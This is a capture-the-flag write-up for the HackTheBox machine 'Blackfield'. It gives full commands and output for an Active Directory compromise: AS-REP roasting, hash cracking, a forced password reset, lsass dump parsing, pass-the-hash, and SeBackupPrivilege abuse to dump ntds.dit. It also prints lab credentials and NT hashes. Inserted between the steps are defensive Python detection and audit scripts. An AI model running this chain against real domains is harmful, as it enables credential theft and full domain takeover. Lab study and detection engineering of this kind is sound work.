
Blackfield is a Windows machine rated Hard on HackTheBox. It is an Active Directory machine where an AS-REP roasting attack gives a first credential, some forensics on a share is then required to obtain a hash for initial access, and finally administrator access is obtained by abusing SeBackupPrivilege.
Enumeration
Running nmap:

```
nmap -sC -sV 10.10.10.192
Nmap scan report for BLACKFIELD.local (10.10.10.192)
Host is up (0.21s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-03 15:06:52Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
```
As we can see, it is an Active Directory domain controller: Kerberos (88), LDAP (389, 3268) and SMB (445) are all exposed.
We will use smbclient to enumerate the SMB shares:

```
smbclient -L 10.10.10.192
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
```
Trying to list the contents of the forensic share we get access denied:

```
smbclient \\\\10.10.10.192\\forensic
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
```
Then, connecting to profiles$ gives a huge list of directories which look like usernames:

```
smbclient \\\\10.10.10.192\\profiles$
smb: \> dir
. D 0 Wed Jun 3 18:47:12 2020
.. D 0 Wed Jun 3 18:47:12 2020
AAlleni D 0 Wed Jun 3 18:47:11 2020
ABarteski D 0 Wed Jun 3 18:47:11 2020
ABekesz D 0 Wed Jun 3 18:47:11 2020
ABenzies D 0 Wed Jun 3 18:47:11 2020
ABiemiller D 0 Wed Jun 3 18:47:11 2020
AChampken D 0 Wed Jun 3 18:47:11 2020
ACheretei D 0 Wed Jun 3 18:47:11 2020
ACsonaki D 0 Wed Jun 3 18:47:11 2020
AHigchens D 0 Wed Jun 3 18:47:11 2020
AJaquemai D 0 Wed Jun 3 18:47:11 2020
AKlado D 0 Wed Jun 3 18:47:11 2020
AKoffenburger D 0 Wed Jun 3 18:47:11 2020
AKollolli D 0 Wed Jun 3 18:47:11 2020
AKruppe D 0 Wed Jun 3 18:47:11 2020
AKubale D 0 Wed Jun 3 18:47:11 2020
ALamerz D 0 Wed Jun 3 18:47:11 2020
AMaceldon D 0 Wed Jun 3 18:47:11 2020
AMasalunga D 0 Wed Jun 3 18:47:11 2020
ANavay D 0 Wed Jun 3 18:47:11 2020
ANesterova D 0 Wed Jun 3 18:47:11 2020
ANeusse D 0 Wed Jun 3 18:47:11 2020
AOkleshen D 0 Wed Jun 3 18:47:11 2020
APustulka D 0 Wed Jun 3 18:47:11 2020
ARotella D 0 Wed Jun 3 18:47:11 2020
ASanwardeker D 0 Wed Jun 3 18:47:11 2020
AShadaia D 0 Wed Jun 3 18:47:11 2020
ASischo D 0 Wed Jun 3 18:47:11 2020
ASpruce D 0 Wed Jun 3 18:47:11 2020
ATakach D 0 Wed Jun 3 18:47:11 2020
ATaueg D 0 Wed Jun 3 18:47:11 2020
ATwardowski D 0 Wed Jun 3 18:47:11 2020
audit2020 D 0 Wed Jun 3 18:47:11 2020
AWangenheim D 0 Wed Jun 3 18:47:11 2020
...
```
The whole listing was copied into users.txt and the junk columns were then stripped, keeping only the first field, with the following bash command:

```
cat users.txt | awk '{print $1 > "text.txt"}'
```
Exploitation
Now that we have a user list, we can use GetNPUsers.py from impacket to perform an AS-REP roasting attack: for every account that has Kerberos pre-authentication disabled, the KDC returns an AS-REP that can be cracked offline. We already know the domain name from the nmap scan (BLACKFIELD.local), and we will write the hash in john format to crack it later:

```
GetNPUsers.py BLACKFIELD.local/ -usersfile users.txt -format john -outputfile hashes.txt -dc-ip 10.10.10.192
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
```
After a while we check the hashes file and find an AS-REP hash for support:

```
cat hashes.txt
$krb5asrep$support@BLACKFIELD.LOCAL:971dafdacb7ef8b994fde97b1da3e9f7$37f9724cdd1f09f1055d9261954951229c7eb2f320512b823127431fbfc61c846c9743b554a9c5462ca86f542d78bdc265cdee806fd7fc33e05785d7b1d93d70d8835818e5eecf7923017ca53b5bbfc288c646c48f52b910286a67ed7d96ff64d4cf7a346d1ae919d7da2153d8fd1ee782e6f6750eb9497ad9eb6f7fe77fc97d924282d4533e7669b4b0f54765be92ad35570f41739821adae12d9ba225d6c6d14736f3b87328ac924809c3d446739232bc766aeea2366a44f40532eca09241c1672f0f11ac5641dbc87af954512553e856783bf62f377c3badce8e77aa56f0ff42fd40f99c68e17319065312ed35f5ed380c964
```
Now we can crack it with john:

```
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --show hashes.txt
$krb5asrep$support@BLACKFIELD.LOCAL:#00^BlackKnight
```
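From the defender's side, the two things worth checking after this step are which accounts are roastable at all and what the KDC logged while GetNPUsers.py ran. The following is an added example, not code from the writeup; account records, event fields and the source address are constructed to look like this box's data.

```python
"""Defender-side checks for the AS-REP roasting step above, run over
constructed sample data (not real Blackfield accounts or logs).
audit_preauth():   accounts whose userAccountControl has DONT_REQ_PREAUTH
                   (0x400000) set and can therefore be AS-REP roasted.
kerberos_alerts(): event 4768 records that look like roasting (pre-auth
                   type 0 with RC4, 0x17) or like the username enumeration
                   GetNPUsers.py causes (many 0x6 failures from one source).
"""
UF_DONT_REQUIRE_PREAUTH = 0x400000   # userAccountControl flag
RC4_HMAC = 0x17                      # TicketEncryptionType: RC4-HMAC
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"  # Status of a failed 4768

def audit_preauth(accounts):
    """Names of accounts that do not require Kerberos pre-authentication."""
    return sorted(a["sAMAccountName"] for a in accounts
                  if a["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH)

def kerberos_alerts(events, enum_threshold=5):
    """Return (alert, source_ip, detail) tuples derived from 4768 events."""
    alerts, unknown = [], {}
    for e in events:
        if e["EventID"] != 4768:
            continue
        ip = e["IpAddress"]
        if e["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown[ip] = unknown.get(ip, 0) + 1      # probe for a nonexistent user
        elif e["PreAuthType"] == 0 and e["TicketEncryptionType"] == RC4_HMAC:
            alerts.append(("asrep-roast", ip, e["TargetUserName"]))
    for ip, n in unknown.items():
        if n >= enum_threshold:
            alerts.append(("user-enum", ip, n))
    return alerts

# Constructed sample data shaped like the page's findings.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "support", "userAccountControl": 0x10200 | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "audit2020", "userAccountControl": 0x10200},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x10200},
]
SOURCE = "10.10.14.5"  # constructed client address
SAMPLE_EVENTS = [
    {"EventID": 4768, "IpAddress": SOURCE, "TargetUserName": u, "Status": "0x6",
     "PreAuthType": "-", "TicketEncryptionType": 0xFFFFFFFF}
    for u in ["AAlleni", "ABarteski", "ABekesz", "ABenzies", "ABiemiller"]
] + [
    {"EventID": 4768, "IpAddress": SOURCE, "TargetUserName": "support",
     "Status": "0x0", "PreAuthType": 0, "TicketEncryptionType": RC4_HMAC},
    {"EventID": 4768, "IpAddress": "10.10.10.50", "TargetUserName": "audit2020",
     "Status": "0x0", "PreAuthType": 2, "TicketEncryptionType": 0x12},
]
```

The fix on the directory side is simply clearing the "Do not require Kerberos preauthentication" flag on the account, which audit_preauth() would then stop reporting.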
With these credentials we can try rpcclient:

```
rpcclient 10.10.10.192 -U support
Enter WORKGROUP\support's password:
rpcclient $>
```
Enumerating users we find new ones such as audit2020:

```
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
```
We can also enumerate privileges from the support session to see whether there is anything usable (note that enumprivs lists every privilege the LSA knows about, not only those actually granted to support):

```
rpcclient $> enumprivs
found 35 privileges
SeCreateTokenPrivilege 0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3)
SeLockMemoryPrivilege 0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 0:5 (0x0:0x5)
SeMachineAccountPrivilege 0:6 (0x0:0x6)
SeTcbPrivilege 0:7 (0x0:0x7)
SeSecurityPrivilege 0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 0:9 (0x0:0x9)
SeLoadDriverPrivilege 0:10 (0x0:0xa)
SeSystemProfilePrivilege 0:11 (0x0:0xb)
SeSystemtimePrivilege 0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe)
SeCreatePagefilePrivilege 0:15 (0x0:0xf)
SeCreatePermanentPrivilege 0:16 (0x0:0x10)
SeBackupPrivilege 0:17 (0x0:0x11)
SeRestorePrivilege 0:18 (0x0:0x12)
SeShutdownPrivilege 0:19 (0x0:0x13)
SeDebugPrivilege 0:20 (0x0:0x14)
SeAuditPrivilege 0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 0:22 (0x0:0x16)
SeChangeNotifyPrivilege 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 0:24 (0x0:0x18)
SeUndockPrivilege 0:25 (0x0:0x19)
SeSyncAgentPrivilege 0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 0:27 (0x0:0x1b)
SeManageVolumePrivilege 0:28 (0x0:0x1c)
SeImpersonatePrivilege 0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f)
SeRelabelPrivilege 0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21)
SeTimeZonePrivilege 0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24)
```
As we see there are lots of privileges. After investigating for a while I found that user passwords could be changed from rpcclient, so I decided to try with the audit2020 account and it was successful:

```
rpcclient $> setuserinfo2 audit2020 23 'N0xi0us'
```
Now with this account we can list the contents of the forensic share:

```
smbclient -U audit2020 \\\\10.10.10.192\\forensic
Enter WORKGROUP\audit2020's password:
smb: \> dir
. D 0 Sun Feb 23 14:03:16 2020
.. D 0 Sun Feb 23 14:03:16 2020
commands_output D 0 Sun Feb 23 19:14:37 2020
memory_analysis D 0 Thu May 28 22:28:33 2020
tools
```
There, inside memory_analysis, we find an interesting file: a dump of lsass, the Windows Local Security Authority Subsystem Service process, which holds credential material for logged-on accounts:

```
smb: \memory_analysis\> dir
. D 0 Thu May 28 22:28:33 2020
.. D 0 Thu May 28 22:28:33 2020
conhost.zip A 37876530 Thu May 28 22:25:36 2020
ctfmon.zip A 24962333 Thu May 28 22:25:45 2020
dfsrs.zip A 23993305 Thu May 28 22:25:54 2020
dllhost.zip A 18366396 Thu May 28 22:26:04 2020
ismserv.zip A 8810157 Thu May 28 22:26:13 2020
lsass.zip A 41936098 Thu May 28 22:25:08 2020
mmc.zip A 64288607 Thu May 28 22:25:25 2020
RuntimeBroker.zip A 13332174 Thu May 28 22:26:24 2020
ServerManager.zip A 131983313 Thu May 28 22:26:49 2020
sihost.zip A 33141744 Thu May 28 22:27:00 2020
smartscreen.zip A 33756344 Thu May 28 22:27:11 2020
svchost.zip A 14408833 Thu May 28 22:27:19 2020
taskhostw.zip A 34631412 Thu May 28 22:27:30 2020
winlogon.zip A 14255089 Thu May 28 22:27:38 2020
wlms.zip A 4067425 Thu May 28 22:27:44 2020
WmiPrvSE.zip A 18303252 Thu May 28 22:27:53 2020
```
Trying to download it we get an error, so instead we mount the directory on our machine:

```
smb: \memory_analysis\> get lsass.zip
Error opening local file lsass.zip
mount -t cifs //10.10.10.192/forensic/memory_analysis /mnt -o user=audit2020
🔐 Password for audit2020@//10.10.10.192/forensic/memory_analysis: *******
```
After unzipping it, we find it contains a memory dump file:

```
ls -l lsass.DMP
-rw-r--r-- 1 root root 143044222 Feb 23 2020 lsass.DMP
```
So, according to this article, we can use mimikatz to extract password hashes from the dump.
As we are on Linux we use pypykatz, a Python implementation of mimikatz.
We just need to adapt the mimikatz syntax slightly and run it; as the output is huge, I will only show the relevant part:

```
pypykatz lsa minidump lsass.DMP
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
```
With this hash we can use the pass-the-hash technique and obtain a shell with evil-winrm:

```
evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
```
Privilege Escalation
Checking this account's privileges we see that SeBackupPrivilege is enabled:

```
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```
This privilege lets a process open any file for reading regardless of its ACL, which is what backup software needs, so with it we effectively have read access to every file on the system; a more detailed explanation of this privilege can be found in this set of slides.
We can get the admin hash by obtaining the SYSTEM registry hive (which holds the boot key) and ntds.dit (the database that stores the AD objects, including password hashes) and then running impacket's secretsdump on them.
The SYSTEM hive can be downloaded easily:

```
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system.hive
Info: Downloading C:\Users\svc_backup\Documents\system.hive to system.hive
Info: Download successful!
```
To obtain ntds.dit we first need diskshadow to create and expose a shadow copy, since the live file is held open by the directory service. The uploaded script contains the commands diskshadow echoes after the -> prompts below:

```
*Evil-WinRM* PS C:\tmp> upload script.txt
Info: Uploading script.txt to C:\tmp\script.txt
Data: 108 bytes of 108 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\tmp> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 10/3/2020 9:33:44 AM
-> set context persistent
-> add volume c: alias mydrive
-> create
Alias mydrive for shadow ID {69711bad-ca22-4576-94eb-daa71cc185be} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {af8518f9-cee1-49d3-8b7e-553757aa0761} set as environment variable.
Querying all shadow copies with the shadow copy set ID {af8518f9-cee1-49d3-8b7e-553757aa0761}
* Shadow copy ID = {69711bad-ca22-4576-94eb-daa71cc185be} %mydrive%
- Shadow copy set: {af8518f9-cee1-49d3-8b7e-553757aa0761} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 10/3/2020 9:34:20 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent Differential
Number of shadow copies listed: 1
-> expose %mydrive% z:
-> %mydrive% = {69711bad-ca22-4576-94eb-daa71cc185be}
The shadow copy was successfully exposed as z:\.
```
Now we upload and import two DLLs, the SeBackupPrivilege PowerShell cmdlets, which open files with backup semantics the way backup software does, so that the privilege actually applies to the copy:

```
*Evil-WinRM* PS C:\tmp> upload SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\tmp> upload SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\tmp> Import-Module ./SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\tmp> Import-Module ./SeBackupPrivilegeUtils.dll
```
Then we copy ntds.dit from the shadow copy to our temp directory and download it:

```
*Evil-WinRM* PS C:\tmp> Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\tmp\ntds.dit
*Evil-WinRM* PS C:\tmp> download ntds.dit
```
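Every step of this escalation path leaves a distinct trace on the domain controller, and a detection rule can key on each of them. The following is an added example, not part of the writeup; it runs over constructed, SIEM-normalised events (the field names, the allow-list and the sample values are made up for this illustration).

```python
"""Detection for the SeBackupPrivilege / shadow-copy path above, run over
constructed, SIEM-normalised events (not Blackfield's real logs).
  4672  logon granted SeBackupPrivilege to an account outside the expected set
  4688  process creation: diskshadow.exe driven by a script file (/s)
  4104  PowerShell script block that loads the SeBackupPrivilege cmdlet DLLs
        or touches ntds.dit (live path or an exposed shadow copy)
"""
import re

# Constructed allow-list; in production derive it from Administrators and
# Backup Operators membership plus the backup product's service account.
EXPECTED_BACKUP_LOGONS = {"BLACKFIELD\\Administrator"}

DISKSHADOW_SCRIPT = re.compile(r"\bdiskshadow(\.exe)?\b.*\s/s\b", re.I)
BACKUP_CMDLETS = re.compile(
    r"SeBackupPrivilege(CmdLets|Utils)\.dll|Copy-FileSeBackupPrivilege", re.I)
NTDS_FILE = re.compile(r"\\windows\\ntds\\ntds\.dit", re.I)

def alerts(events):
    """Return (alert, user) tuples; one event may raise several alerts."""
    out = []
    for e in events:
        eid, who = e["EventID"], e["User"]
        if eid == 4672 and "SeBackupPrivilege" in e.get("PrivilegeList", ""):
            if who not in EXPECTED_BACKUP_LOGONS:
                out.append(("unexpected-backup-priv", who))
        elif eid == 4688 and DISKSHADOW_SCRIPT.search(e.get("CommandLine", "")):
            out.append(("diskshadow-script", who))
        elif eid == 4104:
            text = e.get("ScriptBlockText", "")
            if BACKUP_CMDLETS.search(text):
                out.append(("backup-cmdlets-loaded", who))
            if NTDS_FILE.search(text):
                out.append(("ntds-access", who))
    return out

SVC = "BLACKFIELD\\svc_backup"
SAMPLE_EVENTS = [
    {"EventID": 4672, "User": SVC,
     "PrivilegeList": "SeMachineAccountPrivilege SeBackupPrivilege SeRestorePrivilege"},
    {"EventID": 4688, "User": SVC, "CommandLine": "diskshadow /s script.txt"},
    {"EventID": 4104, "User": SVC,
     "ScriptBlockText": "Import-Module ./SeBackupPrivilegeCmdLets.dll"},
    {"EventID": 4104, "User": SVC, "ScriptBlockText":
     "Copy-FileSebackupPrivilege z:\\Windows\\NTDS\\ntds.dit C:\\tmp\\ntds.dit"},
    {"EventID": 4672, "User": "BLACKFIELD\\Administrator",
     "PrivilegeList": "SeSecurityPrivilege SeBackupPrivilege SeDebugPrivilege"},
]
```

The 4104 rules need PowerShell script block logging enabled; without it only the 4672 and 4688 signals remain.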
Finally we use secretsdump to obtain the admin hash:

```
secretsdump.py -system system -ntds ntds.dit LOCAL
Impacket v0.9.22.dev1+20200728.230151.48a3124c - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
```
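The same secretsdump format is what a defender works from after an authorised ntds.dit extraction for a password audit. The following is an added example, not from the writeup: it parses lines in the domain\user:rid:lmhash:nthash::: layout shown above and reports empty passwords, LM hashes still being stored, and NT hashes shared across accounts (the sample lines and non-empty hash values are constructed).

```python
"""Credential hygiene audit over secretsdump-style lines
(domain\\user:rid:lmhash:nthash:::). Sample lines are constructed; only
the empty-password LM/NT values are the real well-known constants.
"""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

def parse_secretsdump(lines):
    """Yield (user, rid, lmhash, nthash) for each hash line, skipping the
    [*] status lines secretsdump prints around them."""
    for line in lines:
        line = line.strip()
        if not line or line.startswith("["):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        yield parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()

def audit(lines):
    """Return accounts with empty passwords, accounts still storing an LM
    hash, and groups of (non-machine) accounts sharing one NT hash."""
    empty, lm_stored, by_nt = [], [], defaultdict(list)
    for user, rid, lm, nt in parse_secretsdump(lines):
        if nt == EMPTY_NT:
            empty.append(user)
        if lm != EMPTY_LM:
            lm_stored.append(user)
        if not user.endswith("$"):          # machine accounts have random passwords
            by_nt[nt].append(user)
    reused = [sorted(u) for u in by_nt.values() if len(u) > 1]
    return {"empty_password": empty, "lm_stored": lm_stored, "reused": reused}

# Constructed sample output; hash values other than the empty-password
# constants are placeholders, not hashes from this box.
SAMPLE = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1103:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy_user:1104:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
""".splitlines()
```

A shared NT hash between a privileged account and a service account, as in the sample, is exactly the reuse that turns one leaked credential into domain admin.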
We can then obtain an admin shell, again using pass-the-hash:

```
evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
```